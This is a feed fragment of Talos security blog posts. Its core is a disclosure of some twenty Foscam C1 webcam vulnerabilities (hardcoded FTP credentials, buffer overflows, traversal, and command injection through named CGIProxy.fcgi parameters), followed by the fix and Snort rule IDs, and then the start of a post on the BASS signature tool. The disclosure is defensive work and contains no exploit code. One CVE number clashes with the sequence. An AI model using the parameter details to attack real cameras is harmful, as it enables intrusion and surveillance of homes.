id="h.vurr3jvn6g64"&gt;Coverage&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.&lt;br /&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-jE3oS9eR8vQ/WUfuEo-5ohI/AAAAAAAAAUQ/bgPSvwPonqkqaQIudwn7BUEuMhJrcr_MQCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="911" data-original-width="1086" height="536" src="https://2.bp.blogspot.com/-jE3oS9eR8vQ/WUfuEo-5ohI/AAAAAAAAAUQ/bgPSvwPonqkqaQIudwn7BUEuMhJrcr_MQCLcBGAs/s640/image5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. &lt;br /&gt;&lt;br /&gt;CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks. &lt;br /&gt;&lt;br /&gt;Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. &lt;br /&gt;&lt;br /&gt;Umbrella prevents DNS resolution of the domains associated with malicious activity. &lt;br /&gt;&lt;br /&gt;Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=UdXRBd5VW9A:pXS1heqCkN8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/UdXRBd5VW9A" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-19T11:48:04.796-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-3a42reuT9u0/WUftPtxDtnI/AAAAAAAAATo/4DKV8eEdl5wfFFexC9q8euth1clcSj1fwCLcBGAs/s72-c/image2.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/palestine-delphi.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Multiple Foscam C1 Vulnerabilities Come in to Focus</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/NJYd2ILj-uQ/foscam-vuln-details.html</link><category>0-day</category><category>IoT</category><category>Talos</category><category>Vulnerability Research</category><category>vulnerability spotlight</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Mon, 19 Jun 2017 08:45:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6812024606427304106</guid><description>&lt;h2 id="h.4x9n64h9k27j"&gt;Executive Summary&lt;/h2&gt;The Foscam C1 is a webcam that is marketed for use in a variety of applications including home security monitoring. As an indoor webcam, it is designed to be set up inside of a building and features the ability to be accessed remotely via a web interface or from within a mobile application. Talos recently identified several vulnerabilities in the Foscam C1 camera that could be used by attackers for a variety of purposes including access and retrieval of sensitive information stored on the camera, execution of arbitrary commands within the camera's operating system, and in several cases, completely compromise the device. As these cameras are commonly deployed in sensitive locations and used as baby monitors, security cameras, etc. it is recommended that affected devices be updated as quickly as possible to ensure that they are no longer vulnerable.&lt;br /&gt;&lt;br /&gt;In accordance with our responsible disclosure policy, Talos has worked with Foscam to resolve these issues, which has resulted in the release of a firmware update addressing them.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.om6cexyys78v"&gt;Vulnerability Details&lt;/h2&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Foscam C1 Webcam FTP Hard Coded Password Vulnerability (TALOS-2016-0245 / CVE-2016-8731)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Richard Harman and Dave McDaniel of Talos&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Talos recently discovered that Foscam C1 Indoor HD Cameras contain undocumented, hardcoded FTP credentials that could allow an attacker the ability to remotely login to affected devices and gain full read and write access to the Micro-SD card mounted within the device. This access could be used to obtain sensitive information such as audio and video recordings, images, and other data stored on the Micro-SD card. This vulnerability, TALOS-2016-0245 has been assigned CVE-2016-8731. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0245/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera WebService CGI Parameter Code Execution Vulnerability (TALOS-2017-0299 / CVE-2017-2805)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow in the "CGIProxy.fcgi" service of the web management interface. An attacker could use a specially crafted HTTP request to trigger this overflow condition. This vulnerability could be leveraged by an attacker to achieve code execution on vulnerable devices. This vulnerability, TALOS-2017-0299 has been assigned CVE-2017-2805. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0299/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Account Creation Command Injection Vulnerability (TALOS-2017-0328 / CVE-2017-2827)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service of the web management interface. An attacker could insert arbitrary characters into the "addAccount" command via either the "usrName" or "usrPwd" parameters, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. This vulnerability, TALOS-2017-0328 has been assigned CVE-2017-2827. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0328/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Account Password Command Injection Vulnerability (TALOS-2017-0329 / CVE-2017-2828)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service of the web management interface. An attacker could insert arbitrary characters into the "changePassword" command during the account password change process, resulting in execution of arbitrary OS commands. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0329 has been assigned CVE-2017-2828. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0329/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Directory Traversal Vulnerability (TALOS-2017-0330 / CVE-2017-2829)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a directory traversal vulnerability present in the "CGIProxy.fcgi" service of the web management interface. This vulnerability could allow an attacker to retrieve arbitrary files from the camera using an HTTP request. This could result in the disclosure of sensitive information. This vulnerability is due to a failure to adequately sanitize user input and could allow an attacker to traverse outside of the intended directory structure of the web interface. TALOS-2017-0330 has been assigned CVE-2017-2829. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0330/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Message 0x3001 Multi-part Form Boundary Code Execution Vulnerability (TALOS-2017-0331 / CVE-2017-2830)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the "CGIProxy.fcgi" service of the web management interface. Exploitation of this vulnerability could result in the execution of arbitrary code on affected devices. An attacker could trigger this vulnerability using a specially crafted HTTP request to overwrite the buffer on the stack and ultimately obtain control over code execution flow within the device. This vulnerability is due to a failure of the device to perform proper bounds checking on input received from users. TALOS-2017-0331 has been assigned CVE-2017-2830. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0331/"&gt;here&lt;/a&gt;.   &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Query Append Code Execution Vulnerability (TALOS-2017-0332 / CVE-2017-2831)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a buffer overflow vulnerability present in the "FCGX_Init" function within the "CGIProxy.fcgi" service of the web management interface. An attacker could leverage this vulnerability to obtain remote code execution on affected devices. This vulnerability could be triggered using a specially crafted HTTP request and allow an attacker to overwrite the buffer or obtain control over code execution flow within affected devices. TALOS-2017-0332 has been assigned CVE-2017-2831. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0332/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi FTP Startup Configuration Command Injection Vulnerability (TALOS-2017-0334 / CVE-2017-2833)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present within the "webService" application that is launched by the device during the bootup process. An attacker could leverage this vulnerability to execute operating system commands on the device during device startup. This vulnerability can be exploited using any command that allows for changing an account password (e.g. changePassword). During startup the FTP service is configured using shell commands without sanitizing the password parameter, resulting in execution of the attacker supplied commands.  Exploitation of this vulnerability would require access to an account with administrative privileges on the device. The injected command would then be executed once the device reboots. TALOS-2017-0334 has been assigned CVE-2017-2833. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0334/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Account Deletion Command Injection Vulnerability (TALOS-2017-0335 / CVE-2017-2832)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato and another member of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the Account Deletion process within the web interface. An attacker could exploit this vulnerability using a specially crafted HTTP request. The vulnerability is triggered when the "delAccount" command is invoked. Exploitation of this vulnerability would require access to an account with administrative privileges on the device. TALOS-2017-0335 has been assigned CVE-2017-2832. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0335/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Host Parameter Configuration Command Injection Vulnerability (TALOS-2017-0343 / CVE-2017-2841)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Host" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0343 has been assigned CVE-2017-2841. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0343/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test User Parameter Configuration Command Injection Vulnerability (TALOS-2017-0344 / CVE-2017-2842)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test User" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0344 has been assigned CVE-2017-2842. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0344/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Password Parameter Configuration Command Injection Vulnerability (TALOS-2017-0345 / CVE-2017-2843)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Password" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0345 has been assigned CVE-2017-2843. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0345/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Sender Parameter Configuration Command Injection Vulnerability (TALOS-2017-0346 / CVE-2017-2844)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "msmtprc" configuration file on the device, resulting in the execution of the injected commands. An attacker could exploit this vulnerability using a specially crafted HTTP request. This vulnerability can be reached by invoking the "smtpTest" command and injecting commands into the "SMTP Test Sender" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0346 has been assigned CVE-2017-3844. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0346/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi SMTP Test Command Injection Vulnerability (TALOS-2017-0347 / CVE-2017-2845)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands during the SMTP configuration testing process. This vulnerability can be reached by invoking the "smtpTest" command and injecting attacker specified operating system commands. A specially crafted HTTP request can be used to exploit this vulnerability. This vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0347 has been assigned CVE-2017-2845. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0347/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Gateway Address Configuration Command Injection Vulnerability (TALOS-2017-0348 / CVE-2017-2846)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "Gateway Address" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0348 has been assigned CVE-2017-2846. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0348/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi DNS1 Address Configuration Command Injection Vulnerability (TALOS-2017-0349 / CVE-2017-2847)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "DNS1" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0349 has been assigned CVE-2017-2847. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0349/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi DNS2 Address Configuration Command Injection Vulnerability (TALOS-2017-0350 / CVE-2017-2848)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with manual networking configuration. This vulnerability can be reached by invoking the "setIpInfo" command and injecting commands into the "DNS2" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0350 has been assigned CVE-2017-2848. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0350/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi NTP Server Configuration Command Injection Vulnerability (TALOS-2017-0351 / CVE-2017-2849)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a command injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject and execute arbitrary operating system commands using the input fields associated with NTP server address configuration. This vulnerability can be reached by invoking the "setSystemTime" command and injecting commands into the "ntpServer" parameter. This vulnerability requires the attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0351 has been assigned CVE-2017-2849. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0351/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Change Username pureftpd.passwd Injection Vulnerability (TALOS-2017-0352 / CVE-2017-2850)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to an injection vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability could allow an attacker to inject arbitrary operating system commands into the "pureftpd.passwd" configuration file on the device during a username change operation, enabling the attacker to break out of the chroot environment associated with the FTP service on the device. This vulnerability could be used to escalate privileges on affected devices. This vulnerability is reachable by invoking the "changeUserName" command and requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0352 has been assigned CVE-2017-2850. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0352/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Foscam IP Video Camera CGIProxy.fcgi Wifi Settings Code Execution Vulnerability (TALOS-2017-0353 / CVE-2017-2851)&lt;/b&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;i&gt;Vulnerability Discovered by Claudio Bozzato of Cisco Talos.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Foscam C1 Indoor HD Cameras are vulnerable to a stack based buffer overflow vulnerability present in the "CGIProxy.fcgi" service within the web management interface on affected devices. This vulnerability can be exploited using a specially crafted HTTP request during the WiFi configuration on the device. This vulnerability could allow an attacker to overwrite the buffer and potentially lead to remote code execution on affected devices. This vulnerability is reachable by invoking the "setWifiSetting" command. Exploitation of this vulnerability requires an attacker to obtain access to a legitimate account with administrative privileges on the device. TALOS-2017-0353 has been assigned CVE-2017-2851. For additional information, please see the advisory &lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0353/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.7lv692mu22vr"&gt;Versions Tested&lt;/h2&gt;Talos has tested and confirmed that the following Foscam firmware versions are affected:&lt;br /&gt;&lt;br /&gt;Foscam, Inc. Indoor IP Camera C1 Series&lt;br /&gt;System Firmware Version: 1.9.3.17&lt;br /&gt;Application Firmware Version: 2.52.2.37&lt;br /&gt;Web Version: 2.0.1.1&lt;br /&gt;Plug-In Version: 3.3.0.5&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.20my9pwfiqmo"&gt;Conclusion&lt;/h2&gt;One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, version &lt;a href="http://www.foscam.com/downloads/firmware_details.html?id=1"&gt;V-2.x.2.43&lt;/a&gt; to resolve these issues. Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.halfffbm6urf"&gt;Coverage&lt;/h2&gt;The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules:&lt;br /&gt;40908-40909&lt;br /&gt;42078&lt;br /&gt;42431-42437&lt;br /&gt;43005&lt;br /&gt;43061&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=NJYd2ILj-uQ:uW9J5dOrlWY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/NJYd2ILj-uQ" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-19T12:16:13.567-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/foscam-vuln-details.html</feedburner:origLink></item><item><title>BASS - BASS Automated Signature Synthesizer</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/_iH94chsP2c/bass-signature.html</link><category>Automation</category><category>ClamAV</category><category>conferences</category><category>Framework</category><category>Malware Research</category><author>noreply@blogger.com (Alexander Chiu)</author><pubDate>Mon, 19 Jun 2017 02:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-464058494870878630</guid><description>&lt;i&gt;This blog post was authored by &lt;a href="https://twitter.com/jzaddach"&gt;Jonas Zaddach&lt;/a&gt; and &lt;a href="https://twitter.com/emd3l"&gt;Mariano Graziano&lt;/a&gt;.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.vorb53tsb1tc"&gt;Executive Summary&lt;/h2&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-pk1493FXOWQ/WUf8Wn4D6II/AAAAAAAABGA/PcekxM5hnPoEgzuJfyUoS3AiQvQqG72DQCLcBGAs/s1600/BASS_logo_fullcolor_ondark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="915" data-original-width="1600" height="227" src="https://2.bp.blogspot.com/-pk1493FXOWQ/WUf8Wn4D6II/AAAAAAAABGA/PcekxM5hnPoEgzuJfyUoS3AiQvQqG72DQCLcBGAs/s400/BASS_logo_fullcolor_ondark.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Given the rapid pace of change in the threat landscape with new threats emerging and existing ones evolving, there are bound to be challenges defenders face. These challenges can manifest in multiple ways, such as processing and analyzing millions of new and unknown samples received each day. Other challenges include managing resource constraints for our tools used to automate malware analysis, developing antivirus signatures in an efficient manner that will identify malware families, and ensuring tools are able to scale as the number of samples needing to be analyzed increases. To help address these challenges, Talos is releasing a new open source framework called BASS.&lt;br /&gt;&lt;br /&gt;BASS (pronounced "bæs") is a framework designed to automatically generate antivirus signatures from samples belonging to previously generated malware clusters. It is meant to reduce resource usage of ClamAV by producing more pattern-based signatures as opposed to hash-based signatures, and to alleviate the workload of analysts who write pattern-based signatures. The framework is easily scalable thanks to Docker.  &lt;br /&gt;&lt;br /&gt;Please note that this framework is still considered in the Alpha stage and as a result, it will have some rough edges. As this tool is open source and actively maintained by us, we gladly welcome any feedback from the community on improving the functionality of BASS. You can find source code for BASS here:&lt;br /&gt;&lt;br /&gt;&lt;a href="https://github.com/Cisco-Talos/bass"&gt;https://github.com/Cisco-Talos/bass&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;BASS was announced at &lt;a href="https://recon.cx/2017/montreal/"&gt;REcon&lt;/a&gt; 2017 in Montreal, Canada.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h2 id="h.mm6mdfu1bwcp"&gt;Motivation&lt;/h2&gt;&lt;br /&gt;Talos receives about 1.5 million unique samples per day. While most of these samples are known threats that can be filtered out with a malware scan (with ClamAV) right away, a good portion of files remain where further analysis is necessary. At this point, we perform dynamic analysis on this subset where those files will be run in our  sandbox, and then be classified as malicious or not malicious. The remaining portion of malicious files need to be processed further to generate ClamAV signatures which will filter this threat in the earlier stage malware scan in the future.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-3c7b0AERmnA/WUfw9CieGnI/AAAAAAAABFY/yH7n4bRWGiUHIVjBD4wfnKp4IDw4kCeBwCLcBGAs/s1600/image2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;a href="http://3.bp.blogspot.com/-Iv0dagLicvo/WUltDrQpb_I/AAAAAAAAAQ4/mKnESgZvgic65L9fFhTAGQluxvjxirXWACK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B1.jpg" imageanchor="1"&gt;&lt;img border="0" height="308" src="https://3.bp.blogspot.com/-Iv0dagLicvo/WUltDrQpb_I/AAAAAAAAAQ4/mKnESgZvgic65L9fFhTAGQluxvjxirXWACK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B1.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;ClamAV's database increased by about 560,000 signatures in a three-month period (February to April) in 2017, which amounts to 9,500 signatures daily. A large part of these signatures are generated automatically as hash-based signatures. Compared to pattern-based or bytecode-based signatures (the other two main signature types which ClamAV supports), hash-based signatures have the disadvantage of only matching a single file per signature. 